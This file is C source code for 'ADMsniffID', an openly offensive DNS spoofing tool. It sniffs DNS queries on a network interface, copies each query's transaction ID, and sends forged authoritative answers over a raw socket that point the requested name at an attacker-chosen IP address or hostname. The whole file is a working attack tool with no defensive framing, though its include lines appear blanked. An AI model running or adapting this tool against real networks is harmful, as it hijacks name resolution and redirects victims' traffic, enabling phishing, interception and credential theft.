#include #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "ver 0.4 pub" int ETHHDRSIZE; void usage(){ printf("usage : ADMsniffID \n"); printf("ex: ADMsniffID eth0 \"\" \"www.its.me.com\" \n"); exit(ERROR); } void main(int argc, char **argv) { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char SPOOFIP[255]; char bla[255]; char spoofname[255]; char tmp2[255]; char ebuf[255]; char buffer2[1024]; unsigned char namez[255]; int sraw,on=1,tmp1,type; if(argc <2)usage(); if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; strcpy(SPOOFIP,argv[2]); strcpy(spoofname,argv[3]); type = atoi(argv[4]); /* Buffer 'n' tcp/ip stuff */ dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+12); /* bzero(buffer,sizeof(buffer)); */ bzero(bla,sizeof(bla)); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } /* open pcap descriptor */ pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf); printf("ADMsniffID %s (c) ADMnHeike\n",VERSION); while(1){ buffer =(u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == 17) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0) { strcpy(namez,data); nameformat(namez,bla); printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla); bzero(bla,sizeof(bla)); printf("the question have the type %i and type of the query %i\n" ,ntohs(*((u_short *)(data+strlen(data)+1))) ,ntohs(*((u_short *)(data+strlen(data)+2+1)))); /* well in diz version we only spoof the type 'A' */ /* check out for a new version in ftp.janova.org/pub/ADM */ printf("make the spoof packet...\n"); printf("dns header\n"); /* here we gonna start to make the spoofed paket :)*/ memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5); dnssend->id=dnsrecv->id; /* haha the ID ;) */ dnssend->aa=1; /* i've the authority */ dnssend->ra=1; /* i've the recusion */ dnssend->qr=1; /* its a awser */ dnssend->rep_num = htons(1); /* i've one awnser */ printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n" ,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num)); printf("Question..\n"); printf("domainename=%s\n",data2); printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1)))); printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2)))); if( type == TYPE_PTR){ tmp1=strlen(namez)+5; strcpy(data2+tmp1,namez); tmp1=tmp1+strlen(namez)+1; bzero(tmp2,sizeof(tmp2)); nameformat(spoofname,tmp2); printf("tmp2 = %s\n",tmp2); printf(" mouhahahah \n"); *((u_short *)(data2+tmp1)) = htons(TYPE_PTR); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1)); printf("bhaa?.\n"); strcpy((data2+tmp1+2+2+4+2),tmp2); printf(" ouf !! =) \n"); tmp1 = tmp1 +strlen(tmp2)+ 1; } if( type == TYPE_A){ tmp1=strlen(namez)+5; strcpy(data2+tmp1,namez); tmp1=tmp1+strlen(namez)+1; *((u_short *)(data2+tmp1)) = htons(TYPE_A); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(4); *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP); } printf("Answer..\n"); printf("domainname=%s\n",tmp2); printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1)))); printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2)))); printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2)))); printf("resource data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4)))); printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2)))); tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */ /* without the dnshdr */ udp_send(sraw ,ip->daddr ,ip->saddr ,ntohs(udp->dest) ,ntohs(udp->source) ,buffer2 ,DNSHDRSIZE+tmp1); } /* end of the spoof */ } /* end of while(1) */ } /* The End !! ;) */